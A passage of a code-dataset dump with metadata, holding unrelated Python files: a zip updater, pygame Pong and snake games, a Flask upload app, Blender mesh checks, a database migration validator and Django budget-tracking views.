'Programming Language :: Python :: 3.7',\n ], include_package_data=True\n)\n","sub_path":"psl/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582220268","text":"import os\nimport zipfile\nimport urllib.request\n\nf = open('UpdaterFiles/serverData.txt','r')\ntext = f.read()\nadress = text.split('\\n')[0]\nname = text.split('\\n')[1]\nurllib.request.urlretrieve(adress, name)\n\nfh = open(name, 'rb')\nz = zipfile.ZipFile(fh)\nfor n in z.namelist():\n outpath = os.getcwd()\n z.extract(n, 
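# --- Hedged aside: the per-member extract() loop in the updater here is
# what ZipFile.extractall() does in one call; a sketch, assuming (as the
# updater already does) that the downloaded archive is trusted:
import os
import zipfile

def unpack(archive_path):
    # extract every member into the current working directory
    with zipfile.ZipFile(archive_path) as z:
        z.extractall(os.getcwd())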
outpath)\nfh.close()\n\nos.remove(name)","sub_path":"UpdaterFiles/update.py","file_name":"update.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"237890074","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport pygame\nimport sys\nfrom pygame.locals import *\n\n# Przygotowanie zmiennych opisujących okno gry\n# oraz obiekty gry i ich właściwości (paletki, piłeczka)\n# Inicjacja modułu i obiektów Pygame'a\n\n# inicjacja modułu pygame\npygame.init()\n\n# liczba klatek na sekundę\nFPS = 30\n# obiekt zegara, który pozwala śledzić czas\nfpsClock = pygame.time.Clock()\n\n# szerokość i wysokość okna gry\nOKNOGRY_SZER = 800\nOKNOGRY_WYS = 400\n\n# przygotowanie powierzchni do rysowania, czyli inicjacja okna gry\nOKNOGRY = pygame.display.set_mode((OKNOGRY_SZER, OKNOGRY_WYS), 0, 32)\n# tytuł okna gry\npygame.display.set_caption('Prosty Pong')\n\n# kolory wykorzystywane w grze, których składowe RGB zapisane są w tuplach\nLT_BLUE = (230, 255, 255)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n","sub_path":"games_str/pong_str/pong_str1.py","file_name":"pong_str1.py","file_ext":"py","file_size_in_byte":868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"402889667","text":"from flask import Flask, request, jsonify, send_file\n\nimport firebase_driver\n\napp = application = Flask(__name__)\n\n\n@app.route('/upload/', methods=['POST'])\ndef upload(source):\n file = request.files['picture']\n firebase_driver.upload(file, source)\n return jsonify(''), 200\n\n\n@app.route('/', methods=['GET'])\ndef get(source):\n file_path = firebase_driver.get(source)\n return send_file(file_path), 200\n\n\nif __name__ == '__main__':\n app.run(port=8000, debug=True)\n","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"83373852","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\n### --- VERTEX GROUP CHECKS --- ###\n\ndef checkHasAnyVGroups(obj):\n return len(obj.vertex_groups) > 0\n\ndef checkAllVerticesBelongToAVGroup(obj):\n for vert in obj.data.vertices:\n if len(vert.groups) < 1:\n return False\n return True\n\ndef checkAllVerticesBelongToAtMostOneVGroup(obj):\n for vert in obj.data.vertices:\n if len(vert.groups) > 1:\n vgroup_names = {vgroup.index: vgroup.name for vgroup in obj.vertex_groups}\n hint = \"Vertex with index \" + str(vert.index) + \" belongs to the following groups:\\n\"\n grps = \"\"\n for group in vert.groups:\n if len(grps) > 0:\n grps += \", \"\n grps += vgroup_names[group.group]\n return (False, hint + grps)\n return (True, \"\")\n\ndef checkVertexGroupAssignmentsAreNotCorrupt(obj):\n validIndices = []\n for vg in obj.vertex_groups:\n validIndices.append(vg.index)\n for vert in obj.data.vertices:\n for group in vert.groups.keys():\n if not int(group) in validIndices:\n hint = \"Vertex with index \" + str(vert.index) + \" is assigned to a vertex group with index \" + \\\n str(vert.groups[group]) + \",\\nbut that group does not exist\\n\"\n return (False, hint)\n return (True, \"\")\n\ndef checkAllVGroupsInFirstExistsInSecond(firstObj, secondObj):\n firstObjVGroups = []\n secondObjVGroups = []\n\n for vg in firstObj.vertex_groups:\n firstObjVGroups.append(vg.name)\n\n for vg in secondObj.vertex_groups:\n secondObjVGroups.append(vg.name)\n\n hint 
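# --- Hedged aside: checkAllVGroupsInFirstExistsInSecond() here builds
# two name lists and scans one against the other; the same "missing
# groups" test is a set difference (sketch on plain name lists rather
# than Blender objects):
def missing_group_names(first_names, second_names):
    # names present on the first object but absent on the second
    return sorted(set(first_names) - set(second_names))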
= \"\"\n b = True\n for name in firstObjVGroups:\n if not name in secondObjVGroups:\n hint += name + \"\\n\" # do all to create a list\n b = False\n\n return (b, hint)\n\n### --- FACE CHECKS --- ###\n\n# if vertices belong to no faces at all it will also not work\n#\ndef checkStrayVertices(obj):\n verts = obj.data.vertices\n facesfound = {}\n for v in verts:\n facesfound[v.index] = False\n for faces in obj.data.polygons:\n for vn in faces.vertices:\n facesfound[vn] = True\n info = \"\"\n b = True\n cnt = 0\n for v in verts:\n if not facesfound[v.index]:\n b = False\n cnt += 1\n if cnt < 10:\n info += \" \" + str(v.index)\n if info != \"\":\n info = \"Stray verts:\" + info\n return (b, cnt, info)\n\ndef checkNumberOfPoles(obj, max_def):\n verts = obj.data.vertices\n edges = obj.data.edges\n vertEdges = [0 for d in range(len( obj.data.vertices))]\n maxpole = 0\n info = \"\"\n cnt = 0\n\n for edge in edges:\n for vertex in edge.vertices:\n vertEdges[vertex] += 1\n if vertEdges[vertex] > max_def:\n maxpole = vertEdges[vertex] # highest number\n if vertEdges[vertex] == (max_def + 1): # but only count them once\n cnt += 1\n if cnt < 10:\n info += \" \" + str(vertex)\n print (maxpole)\n if info != \"\":\n info = \"Max-Pole is \" + str(maxpole) + \". Vertices:\" + info\n return (maxpole <= max_def, cnt, info)\n \n\ndef checkFacesHaveAtMostFourVertices(obj):\n for polygon in obj.data.polygons:\n verts_in_face = polygon.vertices[:]\n if len(verts_in_face) > 4:\n return False\n return True\n\ndef checkFacesHaveTheSameNumberOfVertices(obj):\n countToLookFor = None\n for polygon in obj.data.polygons:\n verts_in_face = polygon.vertices[:]\n if countToLookFor is None:\n countToLookFor = len(verts_in_face)\n else:\n if len(verts_in_face) != countToLookFor:\n return False\n return True\n\n### --- UV MAP CHECKS --- ###\n\ndef checkNumberOfUVMaps(obj):\n uvlayers = obj.data.uv_layers\n cnt = 0\n if uvlayers:\n for (index,layer) in enumerate(uvlayers.keys()):\n cnt += 1\n if cnt == 0:\n return (False, cnt, \"No texture possible.\")\n elif cnt == 1:\n return (True, cnt, \"\")\n else:\n return (False, cnt, \"Active map is: \" + uvlayers.active.name)\n\n# checkSanityHuman\n# do all tests on a human basemesh\n\ndef checkSanityHuman(context):\n errortext = \"\"\n info = \"\"\n\n humanObj = None\n cnt = 0\n for obj in context.scene.objects:\n if hasattr(obj, \"MhObjectType\"):\n if obj.MhObjectType == \"Basemesh\":\n cnt += 1\n if humanObj is None:\n humanObj = obj\n\n icon = \"\\001\"\n if cnt == 0:\n errortext += \"Could not find any human object in this scene.\\n\"\n icon = \"\\002\"\n elif cnt > 1:\n icon = \"\\002\"\n errortext += \"There are multiple human objects in this scene.\\nTo avoid errors, only use one.\\n\"\n info += icon + \"Number of human objects is exactly 1 in the scene.\\n\"\n\n if cnt == 0: # we have to return, without a human at all no further checks possible\n return (1, info, errortext)\n\n icon = \"\\001\" # now we try the test on the first object\n if not checkHasAnyVGroups(humanObj):\n errortext += \"The human object does not have any vertex group.\\nIt has to have at least one for MakeClothes to work.\\n\"\n icon = \"\\002\"\n info += icon + \"At least one vertex group is available.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkVertexGroupAssignmentsAreNotCorrupt(humanObj)\n if not b:\n errortext += \"The human object has vertices which belong non-existing\\n\" + hint\n icon = \"\\002\"\n info += icon + \"No vertex belongs to a non-existing group.\\n\"\n return (len(errortext) > 0, info, 
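# --- Hedged aside: checkNumberOfPoles() above is a vertex-degree count
# over the edge list; the same idea on plain index pairs, using
# collections.Counter (sketch; pole_vertices is an illustrative name):
from collections import Counter

def pole_vertices(edges, max_degree=8):
    # edges: iterable of (v0, v1) index pairs; returns the vertices
    # whose degree exceeds max_degree
    degree = Counter(v for edge in edges for v in edge)
    return sorted(v for v, d in degree.items() if d > max_degree)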
errortext)\n\n\n\n# checkSanityClothes\n# do all tests on a piece of cloth (called when creating the clothes, but also for a check)\n#\n# allowed to be called with second argument for checks between two objects\n\ndef checkSanityClothes(obj, humanobj=None):\n errortext = \"\"\n info = \"\"\n max_def_poles = 8\n errorcnt = 0\n\n icon = \"\\001\"\n (b, cnt, hint) = checkStrayVertices(obj)\n if not b:\n icon = \"\\002\"\n errortext += \"Object has \" + str(cnt) + \" stray vertices.\\n\" + hint\n errorcnt += 1\n info += icon + \"No stray vertices.\\n\"\n\n icon = \"\\001\"\n (b, cnt, hint) = checkNumberOfPoles(obj, max_def_poles)\n if not b:\n icon = \"\\003\"\n errortext += \"Object has \" + str(cnt) + \" vertices with more than \" + str(max_def_poles) + \" edges attached (poles).\\n\" + hint\n info += icon + \"Number of poles <= \" + str(max_def_poles) + \".\\n\"\n\n icon = \"\\001\"\n suppress = 0\n if not checkFacesHaveAtMostFourVertices(obj):\n errortext += \"This object has at least one face with more than four vertices.\\nN-gons are not supported by MakeClothes.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n suppress = 1\n info += icon + \"Faces do not have more than 4 vertices.\\n\"\n\n # in case that we have somewhere more than 4 vertices, second test will normally also fail\n #\n if suppress == 0:\n icon = \"\\001\"\n if not checkFacesHaveTheSameNumberOfVertices(obj):\n errortext += \"This object has faces with different numbers of vertices.\\nTris *or* quads are supported, but not a mix of the two.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"Faces are either tris or quads.\\n\"\n\n icon = \"\\001\"\n if not checkHasAnyVGroups(obj):\n errortext += \"This object does not have any vertex group.\\nIt has to have at least one for MakeClothes to work.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"At least one vertex group must exist.\\n\"\n\n icon = \"\\001\"\n if not checkAllVerticesBelongToAVGroup(obj):\n errortext += \"This object has vertices which do not belong to a vertex group.\\n\"\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"All vertices belong to a vertex group.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkAllVerticesBelongToAtMostOneVGroup(obj)\n if not b:\n errortext += \"This object has vertices which belong to multiple vertex groups.\\n\" + hint\n errorcnt += 1\n icon = \"\\002\"\n info += icon + \"No vertex belongs to multiple groups.\\n\"\n\n icon = \"\\001\"\n (b, hint) = checkVertexGroupAssignmentsAreNotCorrupt(obj)\n if not b:\n errortext += \"This object has vertices which belong non-existing vertex groups,\\n\" + hint\n icon = \"\\002\"\n info += icon + \"No vertex is assigned to a non existing group.\\n\"\n\n if humanobj is not None:\n icon = \"\\001\"\n (b, hint) = checkAllVGroupsInFirstExistsInSecond(obj, humanobj)\n if not b:\n errorcnt += 1\n errortext += \"This object has vertex groups which are missing on human,\\nThese groups are:\\n\" + hint\n icon = \"\\002\"\n info += icon + \"All vertex groups exist on human.\\n\"\n\n icon = \"\\001\"\n (b, cnt, hint) = checkNumberOfUVMaps(obj)\n if not b:\n icon = \"\\003\"\n info += icon + \"Object has \" + str(cnt) + \" UV-maps. 
\" + hint +\"\\n\"\n\n return (errorcnt > 0, info, errortext)\n","sub_path":"makeclothes/sanitychecks.py","file_name":"sanitychecks.py","file_ext":"py","file_size_in_byte":9072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"158763317","text":"def reversedSumOfDigits(p, n):\n if (p == 0 and n == 1):\n return \"0\"\n a = \"\"\n for i in range(1, n + 1):\n start = 1 if i == 1 else 0\n for d in range(start, 10):\n if ((n - i) * 9 + d >= p):\n a = a + str(d)\n p -= d\n break\n\n if (len(a) == n and p == 0):\n return a\n return \"-1\"\n","sub_path":"tasks/reversedSumOfDigits.py","file_name":"reversedSumOfDigits.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"221341276","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPlayer module.\n\"\"\"\n\nfrom collections import deque\n\nimport pygame\nfrom pygame.locals import (K_LEFT, K_RIGHT, K_UP, K_DOWN, K_l, K_k, K_j,\n K_a, K_d, K_w, K_s, K_c, K_v, K_b)\n\nfrom colors import WHITE, RED, ORANGE, BLUE\nfrom snake import Snake, LEFT, RIGHT, UP, DOWN\nfrom utils import add_vecs\nfrom combat import Weapon, STD_MG, H_GUN, PLASMA_GUN\nfrom settings import (INIT_BOOST, MAX_BOOST, BOOST_COST, BOOST_GAIN,\n BOOST_SPEED, INIT_LIFES, MAX_LIFES, PORTAL_TAG,\n PWRUP_TAG, SHOT_TAG, MAX_HITPOINTS)\n\n# -- Controls --\nCTRLS1 = {'left': K_LEFT, 'right': K_RIGHT, 'up': K_UP, 'down': K_DOWN,\n 'action': K_l, 'boost': K_k, 'nextweapon': K_j}\n\nCTRLS2 = {'left': K_a, 'right': K_d, 'up': K_w, 'down': K_s, 'action': K_c,\n 'boost': K_v, 'nextweapon': K_b}\n\n# -- Players --\nPLAYER1 = {'id': '1', 'color': BLUE, 'ctrls': CTRLS1,\n 'tex': 'snake_body_p1'}\n\nPLAYER2 = {'id': '2', 'color': RED, 'ctrls': CTRLS2,\n 'tex': 'snake_body_p2'}\n\nBOT = {'id': 2, 'color': RED, 'tex': 'snake_body_p2'}\n\n\nclass PlayerBase(object):\n\n \"\"\"\n Player base class.\n \"\"\"\n\n def __init__(self, game, config):\n self.game = game\n self.pid = config['id']\n self.color = config['color']\n self.snake = Snake(game, game.get_spawnpoint(),\n config['tex'], self.pid, self.snake_killed)\n self._lifes = INIT_LIFES\n self.points = 0\n self._boost = INIT_BOOST\n self.boosting = False\n self.weapons = deque((\n Weapon(self.game, self, STD_MG),\n Weapon(self.game, self, H_GUN),\n Weapon(self.game, self, PLASMA_GUN)))\n self.pwrup_targets = {'points': 'points', 'grow': 'snake.grow',\n 'speed': 'snake.speed', 'boost': 'boost',\n 'lifes': 'lifes', 'hp': 'snake.hitpoints'}\n\n @property\n def lifes(self):\n \"\"\"Return lifes.\"\"\"\n return self._lifes\n\n @lifes.setter\n def lifes(self, value):\n \"\"\"Set lifes.\"\"\"\n if value > MAX_LIFES:\n self._lifes = MAX_LIFES\n elif value < 0:\n self._lifes = 0\n else:\n self._lifes = value\n\n @property\n def boost(self):\n \"\"\"Return boost energy.\"\"\"\n return self._boost\n\n @boost.setter\n def boost(self, value):\n \"\"\"Set boost energy.\"\"\"\n if value > MAX_BOOST:\n self._boost = MAX_BOOST\n elif value < 0:\n self._boost = 0\n else:\n self._boost = value\n\n def coll_check_head(self, collobjs):\n \"\"\"Handle collisions for the snake's head.\"\"\"\n for tag, obj in collobjs:\n if (tag.endswith('-body') or tag.endswith('-head')) and \\\n tag != self.snake.head_tag:\n obj.take_damage(35, self.snake.head_tag, False, True,\n 0.7, shrink=1, slowdown=0.03)\n elif tag == PORTAL_TAG:\n self.snake.heading = obj[1]\n self.snake[0] = add_vecs(obj[0], self.snake.heading)\n elif tag == PWRUP_TAG:\n for action 
in obj.actions:\n target = self.pwrup_targets[action['target']]\n if '.' in target:\n target1, target2 = target.split('.')\n attr = getattr(getattr(self, target1), target2)\n setattr(getattr(self, target1),\n target2, attr + action['value'])\n else:\n attr = getattr(self, target)\n setattr(self, target, attr + action['value'])\n obj.collect()\n elif tag == SHOT_TAG:\n self.handle_shot(obj)\n\n def coll_check_body(self, collobjs):\n \"\"\"Handle collisions for the snakes's body.\"\"\"\n for tag, obj in collobjs:\n if tag == SHOT_TAG:\n self.handle_shot(obj)\n\n def handle_shot(self, shot):\n \"\"\"Handle shot.\"\"\"\n self.snake.take_damage(shot.damage, shot.tag, False, True, 1.2,\n slowdown=shot.slowdown, shrink=1)\n shot.hit()\n\n def update(self, delta_time):\n \"\"\"Update player, move snake.\"\"\"\n self.snake.update(delta_time)\n\n self.weapons[0].update(delta_time)\n\n if self.snake.heading != self.snake.prev_heading:\n self.snake.ismoving = True\n\n if self.boost < BOOST_COST * delta_time:\n self.boosting = False\n self.snake.speed_bonus = 0\n\n if self.boosting:\n boost = self.boost - BOOST_COST * delta_time\n if boost < BOOST_COST * delta_time:\n self.boost = 0\n else:\n self.boost = boost\n else:\n self.boost = self.boost + BOOST_GAIN * delta_time\n\n def draw(self, offset):\n \"\"\"Draw snake and UI.\"\"\"\n self.snake.draw()\n self.game.draw_string('Player{0}'.format(self.pid),\n add_vecs((2, 2), offset), self.color)\n self.game.draw_string('{0:.2f}'.format(self.snake.speed),\n add_vecs((56, 2), offset), WHITE)\n self.game.draw_string('Points: {0}'.format(self.points),\n add_vecs((2, 18), offset), WHITE)\n\n pygame.draw.rect(self.game.screen, ORANGE,\n pygame.Rect(add_vecs((100, 2), offset), (104, 20)))\n\n pygame.draw.rect(self.game.screen, RED,\n pygame.Rect(add_vecs((102, 4), offset), (int(\n self.snake.hitpoints /\n float(MAX_HITPOINTS) * 100), 7)))\n\n pygame.draw.rect(self.game.screen, BLUE,\n pygame.Rect(add_vecs((102, 13), offset), (int(\n self.boost / float(MAX_BOOST) * 100), 7)))\n\n self.game.draw_string('{0} {1}'.format(self.weapons[0].wtype,\n self.weapons[0].ammo),\n add_vecs((208, 2), offset), WHITE)\n\n for i in range(self.lifes):\n self.game.graphics.draw('life16x16', add_vecs((100, 24), offset),\n gridcoords=False, offset=(i*18, 0))\n\n def snake_killed(self, killed_by):\n \"\"\"Snake killed event handler.\"\"\"\n if self.lifes > 0:\n self.lifes -= 1\n self.boost = MAX_BOOST\n self.snake.respawn(self.game.get_spawnpoint())\n\n\nclass Player(PlayerBase):\n\n \"\"\"\n Player class.\n \"\"\"\n\n def __init__(self, game, config):\n PlayerBase.__init__(self, game, config)\n\n self.game.key_manager.key_down_event.append(self.key_down)\n self.game.key_manager.key_up_event.append(self.key_up)\n self.ctrls = config['ctrls']\n\n def key_down(self, key):\n \"\"\"Key down event handler.\"\"\"\n if key == self.ctrls['boost']:\n self.boosting = True\n self.snake.speed_bonus = BOOST_SPEED\n elif key == self.ctrls['action']:\n # Has the potential to cause an endless loop.\n while self.weapons[0].ammo <= 0:\n self.weapons.rotate(1)\n self.weapons[0].set_firing(True)\n\n def key_up(self, key):\n \"\"\"Key up event handler.\"\"\"\n if key == self.ctrls['boost']:\n self.boosting = False\n self.snake.speed_bonus = 0\n elif key == self.ctrls['action']:\n self.weapons[0].set_firing(False)\n\n def update(self, delta_time):\n \"\"\"Update player.\"\"\"\n\n PlayerBase.update(self, delta_time)\n\n if self.game.key_manager.key_pressed(self.ctrls['left']) \\\n and self.snake.heading != 
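# --- Hedged aside: the power-up handling in coll_check_head() above
# resolves one-level dotted targets such as 'snake.grow' with chained
# getattr/setattr; the same pattern for arbitrary depth (bump_attr is
# an illustrative name, not part of the game code):
def bump_attr(obj, dotted, delta):
    *head, leaf = dotted.split('.')
    for name in head:
        obj = getattr(obj, name)
    setattr(obj, leaf, getattr(obj, leaf) + delta)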
RIGHT:\n self.snake.set_heading(LEFT)\n elif self.game.key_manager.key_pressed(self.ctrls['up']) \\\n and self.snake.heading != DOWN:\n self.snake.set_heading(UP)\n elif self.game.key_manager.key_pressed(self.ctrls['down']) \\\n and self.snake.heading != UP:\n self.snake.set_heading(DOWN)\n elif self.game.key_manager.key_pressed(self.ctrls['right']) \\\n and self.snake.heading != LEFT:\n self.snake.set_heading(RIGHT)\n\n if self.game.key_manager.key_tapped(self.ctrls['nextweapon']):\n # Dangerous...\n self.weapons.rotate(1)\n while self.weapons[0].ammo <= 0:\n self.weapons.rotate(1)\n","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":8535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"339374867","text":"import mysql_migration as mm\n\n\n# -------------검증 1번-------------------\nconn_dooodb = mm.get_mysql_conn('dooodb')\nwith conn_dooodb:\n dooo_cnt_emp = mm.get_count(conn_dooodb, 'Employee')\n dooo_cnt_dept = mm.get_count(conn_dooodb, 'Department')\n dooo_cnt_job = mm.get_count(conn_dooodb, 'Job')\n dooo_cnt_jobhis = mm.get_count(conn_dooodb, 'Job_history')\n\nconnection = mm.get_oracle_conn()\nwith connection:\n ora_cnt_emp = mm.get_count(connection, 'Employees')\n ora_cnt_dept = mm.get_count(connection, 'Departments')\n ora_cnt_job = mm.get_count(connection, 'Jobs')\n ora_cnt_jobhis = mm.get_count(connection, 'Job_history')\n\n#--------------------------------검증 2번 함수화------------------------------------\n\n\n\nora_emp_column = 'employee_id, first_name, last_name, email, phone_number, hire_date, job_id, round(salary), round(commission_pct * 100), manager_id, department_id'\nmys_emp_column = 'id, first_name, last_name, email, phone_number, hire_date, job_id, round(salary), round(commission_pct * 100), manager_id, department_id'\n\nora_dept_column = 'department_id, department_name, manager_id'\nmys_dept_column = 'id, department_name, manager_id' \n\nora_job_column = 'job_id, job_title, min_salary, max_salary'\nmys_job_column = 'id, job_title, min_salary, max_salary'\n\nora_jobhis_column = 'employee_id, start_date, end_date, job_id, department_id'\nmys_jobhis_column = 'employee_id, start_date, end_date, job_id, department_id'\n\ncounts = [(dooo_cnt_emp, ora_cnt_emp), (dooo_cnt_dept, ora_cnt_dept), (dooo_cnt_job, ora_cnt_job), (dooo_cnt_jobhis, ora_cnt_jobhis) ]\nora_column = [ora_emp_column, ora_dept_column, ora_job_column, ora_jobhis_column]\nora_table = ['Employees', 'Departments', 'Jobs', 'Job_history' ]\nmys_column = [mys_emp_column, mys_dept_column, mys_job_column, mys_jobhis_column]\nmys_table = ['Employee', 'Department', 'Job', 'Job_history' ]\nmys_id = ['id', 'id', 'id', 'employee_id']\n\nfor k in range(0,4):\n if counts[k][0] != counts[k][1]:\n print(\"=================== \", mys_table[k], \" Failed=======================\")\n break\n else:\n mm.valid (ora_column[k], ora_table[k] , mys_column[k], mys_table[k], mys_id[k] )\n\n\n","sub_path":"sql/valid_refac.py","file_name":"valid_refac.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"207406943","text":"from etl.Transformers.TableTransformer import TableTransformer\n\n\nclass CollegesTransformer(TableTransformer):\n LABELS_COLUMN = 'labels'\n EP_LABEL = 'system gen: ep'\n EP_COLLEGE_ID = 4252\n\n def clean_colleges(self, df):\n df.loc[df[self.LABELS_COLUMN].str.contains(self.EP_LABEL), 'college_id'] = self.EP_COLLEGE_ID\n del 
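# --- Hedged aside: both weapon-switch loops in Player above (in
# key_down and in the nextweapon handler) spin forever once every
# weapon is out of ammo -- the inline comments ("endless loop",
# "Dangerous...") concede as much. Bounding the rotation by the deque
# length avoids that; sketch only:
def rotate_to_loaded(weapons):
    for _ in range(len(weapons)):
        if weapons[0].ammo > 0:
            return True
        weapons.rotate(1)
    return False  # every weapon is empty; the caller decides what to do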
df[self.LABELS_COLUMN]\n return df\n","sub_path":"etl/Transformers/HelperClasses/CollegesTransformer.py","file_name":"CollegesTransformer.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"600679164","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User, UserManager\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, get_object_or_404\nfrom django.views.decorators.http import require_http_methods\n\n\nfrom .models import Budget, Transaction, TransactionForm, Account, AccountForm, Category, CategoryForm, ParentCategory, Allocation, AllocationForm\n\nfrom datetime import datetime\n\n# Create your views here.\n\n# Authentication Views\ndef _login(request):\n if request.method == \"POST\":\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n if user.is_active:\n login(request, user)\n return HttpResponseRedirect(reverse('budget-index'))\n else:\n return HttpResponse('You are not an active user.')\n else:\n return render(request, 'budget/login.html', {'error': 'Invalid login credentials'})\n else:\n if request.user.is_authenticated():\n return HttpResponseRedirect(reverse('budget-index'))\n else:\n return render(request, 'budget/login.html') \n \ndef _logout(request):\n logout(request)\n return render(request, 'budget/login.html')\n \ndef register(request):\n if request.method != \"POST\":\n return render(request, 'budget/register.html')\n else:\n # Check if the passwords are identical\n if request.POST['password'] != request.POST['passwordagain']:\n return render(request, 'budget/register.html', {'error' : 'Passwords do not match.'})\n \n username = request.POST['username']\n password = request.POST['password']\n \n user = User.objects.create_user(username=username, password=password)\n \n return render(request, 'budget/login.html')\n\n@login_required\ndef index(request):\n user = request.user\n budget = Budget.objects.filter(\n user=user\n )\n if budget:\n return render(request, 'budget/index.html', {'budgets': budget})\n else:\n return render(request, 'budget/newbudget.html')\n\n@login_required\ndef budget(request, pk):\n user = request.user\n budget = Budget.objects.get(\n user=user,\n pk=pk,\n )\n form = TransactionForm()\n new_account_form = AccountForm()\n new_category_form = CategoryForm()\n new_allocation_form = AllocationForm()\n return render(request, 'budget/budget.html', {\n 'budget' : budget, \n 'form': form,\n 'new_account_form': new_account_form,\n 'new_category_form': new_category_form,\n 'new_allocation_form': new_allocation_form,\n })\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_transaction(request):\n f = TransactionForm(request.POST)\n new_transaction = f.save(commit=False)\n new_transaction.user = request.user\n new_transaction.budget = Budget.objects.get(pk=request.POST['id_budget'])\n new_transaction.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\ndef update_transaction(request, id_transaction):\n if request.method == \"GET\":\n instance = 
Transaction.objects.get(user=request.user,pk=id_transaction)\n form = TransactionForm(instance=instance)\n new_account_form = AccountForm()\n return render(request, 'budget/transaction-update.html', {\n 'budget' : budget, \n 'form': form, \n 'new_account_form': new_account_form, \n 'instance': instance\n })\n elif request.method == \"POST\":\n transaction = Transaction.objects.get(user=request.user, pk=id_transaction)\n form = TransactionForm(request.POST, instance=transaction)\n form.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[transaction.budget.pk]))\n\n@login_required\n@require_http_methods([\"POST\"])\ndef delete_transaction(request, id_transaction):\n transaction = Transaction.objects.get(user=request.user, pk=id_transaction)\n transaction.delete()\n messages.info(request, 'Transaction deleted')\n return HttpResponseRedirect(reverse('budget-budget', args=[transaction.budget.pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_account(request):\n f = AccountForm(request.POST)\n new_account = f.save(commit=False)\n new_account.user = request.user\n new_account.budget = Budget.objects.get(pk=request.POST['id_budget'])\n new_account.save()\n t = Transaction(\n user = request.user,\n account = new_account,\n budget = new_account.budget,\n transaction_date = f.cleaned_data['initial_balance_date'],\n payee = \"Initial Balance\",\n category = None,\n inflow = f.cleaned_data['initial_balance'],\n cleared = True,\n \n )\n t.save()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef delete_account(request, id_account):\n account = Account.objects.get(user=request.user, pk=id_account)\n account.delete()\n messages.info(request, 'Account deleted')\n return HttpResponseRedirect(reverse('budget-budget', args=[account.budget.pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_category(request, id_parent_category):\n f = CategoryForm(request.POST)\n category = f.save(commit=False)\n category.user = request.user\n category.parentCategory = ParentCategory.objects.get(user=request.user, pk=id_parent_category)\n category.save()\n messages.info(request, 'Category %s created' % category.name)\n return HttpResponseRedirect(reverse('budget-budget', args=[request.POST['id_budget']]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef delete_category(request, id_category):\n category = get_object_or_404(\n Category,\n user = request.user,\n pk = id_category,\n )\n category.delete()\n return HttpResponseRedirect(reverse('budget-budget', args=[request.user.budget_set.all()[0].pk]))\n \n@login_required\n@require_http_methods([\"POST\"])\ndef create_allocation(request, category, year=2016, month=4):\n try:\n allocation = Allocation.objects.get(\n user = request.user,\n category = Category.objects.get(user=request.user, pk=category),\n month__year=int(year),\n month__month=int(month),\n )\n except ObjectDoesNotExist:\n f = AllocationForm(request.POST)\n allocation = f.save(commit=False)\n allocation.save(\n user = request.user,\n category = Category.objects.get(\n user = request.user,\n pk = category,\n ),\n month = datetime(int(year), int(month), 1),\n )\n allocation.amount = request.POST['amount']\n allocation.save() \n return HttpResponseRedirect(reverse('budget-budget', 
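# --- Hedged aside: create_allocation() here reimplements Django's
# get_or_create() with a try/except ObjectDoesNotExist; note also that,
# as written, allocation.save(user=..., category=..., month=...) passes
# model fields to Model.save(), which does not accept them. A sketch of
# the one-call equivalent, reusing this module's imports:
def get_or_create_allocation(user, category_pk, year, month, amount):
    category = Category.objects.get(user=user, pk=category_pk)
    allocation, _created = Allocation.objects.get_or_create(
        user=user,
        category=category,
        month=datetime(int(year), int(month), 1),
        defaults={'amount': amount},
    )
    return allocation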
